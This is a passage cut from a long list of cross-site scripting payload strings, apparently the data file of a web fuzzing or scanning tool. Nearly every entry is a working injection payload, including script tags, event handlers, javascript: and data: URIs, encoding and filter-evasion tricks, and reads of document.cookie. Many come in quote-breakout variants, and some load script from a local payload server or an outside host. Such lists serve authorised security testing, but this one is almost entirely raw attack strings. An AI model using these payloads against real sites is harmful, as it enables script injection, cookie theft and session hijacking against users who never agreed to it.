CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'X\');">', '"><META HTTP-EQUIV="refresh" CONTENT="0; 
URL=http://;URL=javascript:alert(\'X\');">', '\'><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'X\');">', '<IFRAME SRC="javascript:alert(\'X\');"></IFRAME>', '"><IFRAME SRC="javascript:alert(\'X\');"></IFRAME>', '\'><IFRAME SRC="javascript:alert(\'X\');"></IFRAME>', '<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>', '"><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>', '\'><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>', '<FRAMESET><FRAME SRC="javascript:alert(\'X\');"></FRAMESET>', '"><FRAMESET><FRAME SRC="javascript:alert(\'X\');"></FRAMESET>', '\'><FRAMESET><FRAME SRC="javascript:alert(\'X\');"></FRAMESET>', '<TABLE BACKGROUND="javascript:alert(\'X\')">', '"><TABLE BACKGROUND="javascript:alert(\'X\')">', '\'><TABLE BACKGROUND="javascript:alert(\'X\')">', '<TABLE><TD BACKGROUND="javascript:alert(\'X\')">', '"><TABLE><TD BACKGROUND="javascript:alert(\'X\')">', '\'><TABLE><TD BACKGROUND="javascript:alert(\'X\')">', '<DIV STYLE="background-image: url(javascript:alert(\'X\'))">', '"><DIV STYLE="background-image: url(javascript:alert(\'X\'))">', '\'><DIV STYLE="background-image: url(javascript:alert(\'X\'))">', '<DIV STYLE="background-image: url(javascript:alert(\'X\'))">', '"><DIV STYLE="background-image: url(javascript:alert(\'X\'))">', '\'><DIV STYLE="background-image: url(javascript:alert(\'X\'))">', '<DIV STYLE="width: expression(alert(\'X\'));">', '"><DIV STYLE="width: expression(alert(\'X\'));">', '\'><DIV STYLE="width: expression(alert(\'X\'));">', '<BASE HREF="javascript:alert(\'X\');//">', '"><BASE HREF="javascript:alert(\'X\');//">', '\'><BASE HREF="javascript:alert(\'X\');//">', '<object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/X.js"></object>', '"><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/X.js"></object>', '\'><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/X.js"></object>', '<object 
type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></object>', '"><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></object>', '\'><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></object>', '<OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"></OBJECT>', '"><OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"></OBJECT>', '\'><OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"></OBJECT>', '<EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '"><EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '\'><EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '<SCRIPT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.jpg"></SCRIPT>', '"><SCRIPT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.jpg"></SCRIPT>', '\'><SCRIPT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.jpg"></SCRIPT>', '<!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>\'"-->', '"><!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>\'"-->', '\'><!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>\'"-->', '<!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>\'"-->', '"><!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>\'"-->', '\'><!--#exec cmd="/bin/echo 
\'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>\'"-->', '<? echo(\'<SCR)\';echo(\'IPT>alert("X")</SCRIPT>\'); ?>', '"><? echo(\'<SCR)\';echo(\'IPT>alert("X")</SCRIPT>\'); ?>', '\'><? echo(\'<SCR)\';echo(\'IPT>alert("X")</SCRIPT>\'); ?>', 'Redirect 302 /axaaX.jpg http://127.0.0.1:3555/xss_serve_payloads/X.html', '<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'X\')</SCRIPT>">', '"><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'X\')</SCRIPT>">', '\'><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'X\')</SCRIPT>">', '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'X\');+ADw-/SCRIPT+AD4-', '"><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'X\');+ADw-/SCRIPT+AD4-', '\'><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'X\');+ADw-/SCRIPT+AD4-', '<A HREF="http://127.0.0.1/">X</A>', '"><A HREF="http://127.0.0.1/">X</A>', '\'><A HREF="http://127.0.0.1/">X</A>', '<A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>', '"><A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>', '\'><A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>', '<A HREF="http://0102.0146.0007.00000223/">X</A>', '"><A HREF="http://0102.0146.0007.00000223/">X</A>', '\'><A HREF="http://0102.0146.0007.00000223/">X</A>', '<A HREF="htt\tp://6\t6.000146.0x7.147/">X</A>', '"><A HREF="htt\tp://6\t6.000146.0x7.147/">X</A>', '\'><A HREF="htt\tp://6\t6.000146.0x7.147/">X</A>', '<iframe %00 src="	javascript:prompt(1)	"%00>', '"><iframe %00 src="	javascript:prompt(1)	"%00>', '\'><iframe %00 src="	javascript:prompt(1)	"%00>', "<svg><style>{font-family:'<iframe/onload=confirm(1)>'", '"><svg><style>{font-family:\'<iframe/onload=confirm(1)>\'', "'><svg><style>{font-family:'<iframe/onload=confirm(1)>'", '<input/onmouseover="javaSCRIPT:confirm(1)"', 
'"><input/onmouseover="javaSCRIPT:confirm(1)"', '\'><input/onmouseover="javaSCRIPT:confirm(1)"', '<sVg><scRipt %00>alert(1) {Opera}', '"><sVg><scRipt %00>alert(1) {Opera}', "'><sVg><scRipt %00>alert(1) {Opera}", '<img/src=`%00` onerror=this.onerror=confirm(1)', '"><img/src=`%00` onerror=this.onerror=confirm(1)', "'><img/src=`%00` onerror=this.onerror=confirm(1)", '<form><isindex formaction="javascript:confirm(1)"', '"><form><isindex formaction="javascript:confirm(1)"', '\'><form><isindex formaction="javascript:confirm(1)"', '<img src=`%00`
 onerror=alert(1)
', '"><img src=`%00`
 onerror=alert(1)
', "'><img src=`%00`
 onerror=alert(1)
", "<script/	 src='http://127.0.0.1:3555/xss_serve_payloads/X.js' /	></script>", '"><script/	 src=\'http://127.0.0.1:3555/xss_serve_payloads/X.js\' /	></script>', "'><script/	 src='http://127.0.0.1:3555/xss_serve_payloads/X.js' /	></script>", "<script/	 src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp' /	></script>", '"><script/	 src=\'http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp\' /	></script>', "'><script/	 src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp' /	></script>", '<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?', '"><ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?', "'><ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?", '<iframe/src="data:text/html;	base64	,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><iframe/src="data:text/html;	base64	,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><iframe/src="data:text/html;	base64	,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/', '"><script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/', "'><script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/", ""><h1/onmouseover='\\u0061lert(1)'>%00", '<iframe/src="data:text/html,<svg onload=alert(1)>">', '"><iframe/src="data:text/html,<svg onload=alert(1)>">', '\'><iframe/src="data:text/html,<svg onload=alert(1)>">', '<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>', '"><meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>', '\'><meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>', "<svg><script xlink:href=data:,window.open('https://127.0.0.1:3555/xss_serve_payloads/X.html')></script", '"><svg><script xlink:href=data:,window.open(\'https://127.0.0.1:3555/xss_serve_payloads/X.html\')></script', "'><svg><script xlink:href=data:,window.open('https://127.0.0.1:3555/xss_serve_payloads/X.html')></script", "<svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/X.js'", '"><svg><script x:href=\'http://127.0.0.1:3555/xss_serve_payloads/X.js\'', "'><svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/X.js'", "<svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'", '"><svg><script x:href=\'http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp\'', "'><svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'", '<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">', '"><meta http-equiv="refresh" content="0;url=javascript:confirm(1)">', '\'><meta http-equiv="refresh" content="0;url=javascript:confirm(1)">', '<iframe src=javascript:alert(document.location)>', '"><iframe src=javascript:alert(document.location)>', "'><iframe src=javascript:alert(document.location)>", '<form><a href="javascript:\\u0061lert(1)">X', '"><form><a href="javascript:\\u0061lert(1)">X', '\'><form><a href="javascript:\\u0061lert(1)">X', '</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror=\'eval(src)\'>', '"></script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror=\'eval(src)\'>', '\'></script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror=\'eval(src)\'>', '<img/	  src=`~` onerror=prompt(1)>', '"><img/	  src=`~` onerror=prompt(1)>', "'><img/	  src=`~` onerror=prompt(1)>", '<form><iframe 	  src="javascript:alert(1)" 	;>', '"><form><iframe 	  src="javascript:alert(1)" 	;>', '\'><form><iframe 	  src="javascript:alert(1)" 	;>', '<a href="data:application/x-x509-user-cert;
base64
,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="	 >X</a', '"><a href="data:application/x-x509-user-cert;
base64
,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="	 >X</a', '\'><a href="data:application/x-x509-user-cert;
base64
,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="	 >X</a', 'http://www.keralacyberforce<script .in>alert(document.location)</script', '<a href=[�]"� onmouseover=prompt(1)//">XYZ</a', '"><a href=[�]"� onmouseover=prompt(1)//">XYZ</a', '\'><a href=[�]"� onmouseover=prompt(1)//">XYZ</a', "<img/src=@  onerror = prompt('1')", '"><img/src=@  onerror = prompt(\'1\')', "'><img/src=@  onerror = prompt('1')", "<style/onload=prompt('XSS')", '"><style/onload=prompt(\'XSS\')', "'><style/onload=prompt('XSS')", '<script ^__^>alert(String.fromCharCode(49))</script ^__^', '"><script ^__^>alert(String.fromCharCode(49))</script ^__^', "'><script ^__^>alert(String.fromCharCode(49))</script ^__^", '</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(', '"></style  ><script   :-(>/**/alert(document.location)/**/</script   :-(', "'></style  ><script   :-(>/**/alert(document.location)/**/</script   :-(", '�</form><input type="date" onfocus="alert(1)">', "<form><textarea onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074(1)'>", '"><form><textarea onkeyup=\'\\u0061\\u006C\\u0065\\u0072\\u0074(1)\'>', "'><form><textarea onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074(1)'>", "<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/", '"><script /***/>/***/confirm(\'\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450\')/***/</script /***/', "'><script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/", "<iframe srcdoc='<body onload=prompt(1)>'>", '"><iframe srcdoc=\'<body onload=prompt(1)>\'>', "'><iframe srcdoc='<body onload=prompt(1)>'>", '<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>', '"><a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>', '\'><a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>', '<script ~~~>alert(0%0)</script ~~~>', '"><script ~~~>alert(0%0)</script ~~~>', "'><script ~~~>alert(0%0)</script ~~~>", '<style/onload=<!--	> alert (1)>', '"><style/onload=<!--	> alert (1)>', "'><style/onload=<!--	> alert (1)>", "<///style///><span %2F onmousemove='alert(1)'>SPAN", '"><///style///><span %2F onmousemove=\'alert(1)\'>SPAN', "'><///style///><span %2F onmousemove='alert(1)'>SPAN", "<img/src='http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg' onmouseover=	prompt(1)", '"><img/src=\'http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg\' onmouseover=	prompt(1)', "'><img/src='http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg' onmouseover=	prompt(1)", ""><svg><style>{-o-link-source:'<body/onload=confirm(1)>'", ' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}', "<marquee onstart='javascript:alert(1)'>^__^", '"><marquee onstart=\'javascript:alert(1)\'>^__^', "'><marquee onstart='javascript:alert(1)'>^__^", '<div/style="width:expression(confirm(1))">X</div>', '"><div/style="width:expression(confirm(1))">X</div>', '\'><div/style="width:expression(confirm(1))">X</div> {IE7}', '"><div/style="width:expression(confirm(1))">X</div>', '"><div/style="width:expression(confirm(1))">X</div>', '\'><div/style="width:expression(confirm(1))">X</div> {IE7}', '\'><div/style="width:expression(confirm(1))">X</div>', '"><div/style="width:expression(confirm(1))">X</div>', '\'><div/style="width:expression(confirm(1))">X</div> {IE7}', '<iframe/%00/ src=javaSCRIPT:alert(1)', '"><iframe/%00/ src=javaSCRIPT:alert(1)', "'><iframe/%00/ src=javaSCRIPT:alert(1)", "//<form/action=javascript:alert(document.cookie)><input/type='submit'>//", '/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>', "//|\\\\ <script //|\\\\ src='http://127.0.0.1:3555/xss_serve_payloads/X.js'> //|\\\\ </script //|\\\\", "//|\\\\ <script //|\\\\ src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'> //|\\\\ </script //|\\\\", 
"</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>", '"></font>/<svg><style>{src:\'<style/onload=this.onload=confirm(1)>\'</font>/</style>', "'></font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>", '<a/href="javascript: javascript:prompt(1)"><input type="X">', '"><a/href="javascript: javascript:prompt(1)"><input type="X">', '\'><a/href="javascript: javascript:prompt(1)"><input type="X">', '</plaintext\\></|\\><plaintext/onmouseover=prompt(1)', '"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)', "'></plaintext\\></|\\><plaintext/onmouseover=prompt(1)", "</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1)", '"></svg>\'\'<svg><script \'AQuickBrownFoxJumpsOverTheLazyDog\'>alert(1)', "'></svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1)", '<a href="javascript:\\u0061le%72t(1)"><button>', '"><a href="javascript:\\u0061le%72t(1)"><button>', '\'><a href="javascript:\\u0061le%72t(1)"><button>', "<div onmouseover='alert(1)'>DIV</div>", '"><div onmouseover=\'alert(1)\'>DIV</div>', "'><div onmouseover='alert(1)'>DIV</div>", '<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">', '"><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">', '\'><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">', '<a href="jAvAsCrIpT:alert(1)">X</a>', '"><a href="jAvAsCrIpT:alert(1)">X</a>', '\'><a href="jAvAsCrIpT:alert(1)">X</a>', '<a href=javascript:alert(document.cookie)>X</a>', '"><a href=javascript:alert(document.cookie)>X</a>', "'><a href=javascript:alert(document.cookie)>X</a>", '<img src="/" =_=" title="onerror=\'prompt(1)\'">', '"><img src="/" =_=" title="onerror=\'prompt(1)\'">', '\'><img src="/" =_=" title="onerror=\'prompt(1)\'">', "<%<!--'%><script>alert(1);</script -->", '"><%<!--\'%><script>alert(1);</script -->', "'><%<!--'%><script>alert(1);</script -->", 
'<script src="data:text/javascript,alert(1)"></script>', '"><script src="data:text/javascript,alert(1)"></script>', '\'><script src="data:text/javascript,alert(1)"></script>', '<iframe/src \\/\\/onload = prompt(1)', '"><iframe/src \\/\\/onload = prompt(1)', "'><iframe/src \\/\\/onload = prompt(1)", '<iframe/onreadystatechange=alert(1)', '"><iframe/onreadystatechange=alert(1)', "'><iframe/onreadystatechange=alert(1)", '<svg/onload=alert(1)', '"><svg/onload=alert(1)', "'><svg/onload=alert(1)", '<input value=<><iframe/src=javascript:confirm(1)', '"><input value=<><iframe/src=javascript:confirm(1)', "'><input value=<><iframe/src=javascript:confirm(1)", '<input type="text" value=`` <div/onmouseover=\'alert(1)\'>X</div>', '"><input type="text" value=`` <div/onmouseover=\'alert(1)\'>X</div>', '\'><input type="text" value=`` <div/onmouseover=\'alert(1)\'>X</div>', 'http://www.<script>alert(1)</script .com', '<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>', '"><iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>', "'><iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>", '<svg><script ?>alert(1)', '"><svg><script ?>alert(1)', "'><svg><script ?>alert(1)", '<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>', '"><iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>', "'><iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>", '<img src=`xx:xx`onerror=alert(1)>', '"><img src=`xx:xx`onerror=alert(1)>', "'><img src=`xx:xx`onerror=alert(1)>", '<meta http-equiv="refresh" content="0;javascript:alert(1)"/>', '"><meta http-equiv="refresh" content="0;javascript:alert(1)"/>', '\'><meta http-equiv="refresh" content="0;javascript:alert(1)"/>', '<math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">X', '"><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">X', '\'><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">X', '<math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp">X', '"><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp">X', '\'><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp">X', '<embed code="http://127.0.0.1:3555/xss_serve_payloads/X.swf" allowscriptaccess=always>', '"><embed code="http://127.0.0.1:3555/xss_serve_payloads/X.swf" allowscriptaccess=always>', '\'><embed code="http://127.0.0.1:3555/xss_serve_payloads/X.swf" allowscriptaccess=always>', '<svg contentScriptType=text/vbs><script>MsgBox+1', '"><svg contentScriptType=text/vbs><script>MsgBox+1', "'><svg contentScriptType=text/vbs><script>MsgBox+1", '<a href="data:text/html;base64_,<svg/onload=\\u0061le%72t(1)>">X</a', '"><a href="data:text/html;base64_,<svg/onload=\\u0061le%72t(1)>">X</a', '\'><a href="data:text/html;base64_,<svg/onload=\\u0061le%72t(1)>">X</a', "<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>", '"><iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074(\'\\u0061\') worksinIE>', "'><iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>", 
"<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", '"><script>~\'\\u0061\' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~\'\\u0061\')</script U+', "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "'><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", '<script/src="data:text%2Fj\\u0061v\\u0061script,\\u0061lert(\'\\u0061\')"></script a=\\u0061 & /=%2F', '"><script/src="data:text%2Fj\\u0061v\\u0061script,\\u0061lert(\'\\u0061\')"></script a=\\u0061 & /=%2F', '\'><script/src="data:text%2Fj\\u0061v\\u0061script,\\u0061lert(\'\\u0061\')"></script a=\\u0061 & /=%2F', '<script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script', '"><script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script', "'><script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script", '<object data=javascript:\\u0061le%72t(1)>', '"><object data=javascript:\\u0061le%72t(1)>', "'><object data=javascript:\\u0061le%72t(1)>", '<script>+-+-1-+-+alert(1)</script>', '</ScrIpt><script>+-+-1-+-+alert(1)</script>', '"><script>+-+-1-+-+alert(1)</script>', '</ScrIpt><script>+-+-1-+-+alert(1)</script>', "'><script>+-+-1-+-+alert(1)</script>", '</ScrIpt><script>+-+-1-+-+alert(1)</script>', '<body/onload=<!-->
alert(1)>', '"><body/onload=<!-->
alert(1)>', "'><body/onload=<!-->
alert(1)>", '<script allbrowserX>/*<script* */alert(1)</script', '"><script allbrowserX>/*<script* */alert(1)</script', "'><script allbrowserX>/*<script* */alert(1)</script", '<img src ?X?\\/onerror = alert(1)', '"><img src ?X?\\/onerror = alert(1)', "'><img src ?X?\\/onerror = alert(1)", '<svg><script>//
confirm(1);</script </svg>', '"><svg><script>//
confirm(1);</script </svg>', "'><svg><script>//
confirm(1);</script </svg>", '<svg><script onlypossibleinopera:-)> alert(1)', '"><svg><script onlypossibleinopera:-)> alert(1)', "'><svg><script onlypossibleinopera:-)> alert(1)", '<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>X', '"><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>X', "'><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>X", '<script x> alert(1) </script 1=2', '"><script x> alert(1) </script 1=2', "'><script x> alert(1) </script 1=2", '<div/onmouseover=\'alert(1)\'> style="x:">', '"><div/onmouseover=\'alert(1)\'> style="x:">', '\'><div/onmouseover=\'alert(1)\'> style="x:">', '<--`<img/src=` onerror=alert(1)> --!>', '"><--`<img/src=` onerror=alert(1)> --!>', "'><--`<img/src=` onerror=alert(1)> --!>", '<script/src=data:text/javascript,alert(1)></script>', '"><script/src=data:text/javascript,alert(1)></script>', "'><script/src=data:text/javascript,alert(1)></script>", '<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>', '"><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>', '\'><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>', "<img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');>", '"><img src=x onerror=window.open(\'http://127.0.0.1:3555/xss_serve_payloads/X.html\');>', "'><img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');>", '<form><button formaction=javascript:alert(1)>X', '"><form><button formaction=javascript:alert(1)>X', "'><form><button formaction=javascript:alert(1)>X", '<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>', '"><iframe 
src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>', '\'><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>', '<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">X</a>', '"><a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">X</a>', '\'><a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">X</a>', '<sVg><scRipt %00>prompt(/', '"><sVg><scRipt %00>prompt(/', "'><sVg><scRipt %00>prompt(/", "w=window.open('invalidfileinvalidfileinvalidfile','target');setTimeout('alert(w.document.location);w.close();',1);", 'try%7Balert(1)%7Dcatch(e)%7Blocation.reload()%7D', '<div id="alert(\'/X/\')" style="x:expression(eval)(id)">', '"><div id="alert(\'/X/\')" style="x:expression(eval)(id)">', '\'><div id="alert(\'/X/\')" style="x:expression(eval)(id)">', '0\\%22))}catch(e){alert(1)}//', '<img language=vbs src=<b onerror=alert#1/1#>', '"><img language=vbs src=<b onerror=alert#1/1#>', "'><img language=vbs src=<b onerror=alert#1/1#>", "<script>alert(1)/X/'</script>", "</ScrIpt><script>alert(1)/X/'</script>", '"><script>alert(1)/X/\'</script>', "</ScrIpt><script>alert(1)/X/'</script>", "'><script>alert(1)/X/'</script>", "</ScrIpt><script>alert(1)/X/'</script>", "<script>alert(1)<!-- '</script>", "</ScrIpt><script>alert(1)<!-- '</script>", '"><script>alert(1)<!-- \'</script>', "</ScrIpt><script>alert(1)<!-- '</script>", "'><script>alert(1)<!-- '</script>", "</ScrIpt><script>alert(1)<!-- '</script>", '<script> var a = "X"; alert(1); </script>', '</ScrIpt><script> var a = "X"; alert(1); </script>', '"><script> var a = "X"; alert(1); </script>', '</ScrIpt><script> var a = "X"; alert(1); </script>', '\'><script> var a = "X"; alert(1); </script>', '</ScrIpt><script> var a = "X"; alert(1); </script>', "<script> var a=1'; alert(1); </script>", "</ScrIpt><script> var a=1'; 
